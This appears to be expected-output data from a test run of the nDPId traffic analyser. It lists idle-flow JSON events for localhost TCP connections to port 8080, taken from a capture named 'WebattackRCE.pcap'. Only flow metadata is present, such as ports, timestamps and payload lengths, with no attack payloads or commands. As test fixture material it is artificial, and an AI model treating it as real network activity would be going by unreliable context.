+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7560000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7560000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7560000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7560000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7560000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7560000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7560000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7560000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7560000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7560000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 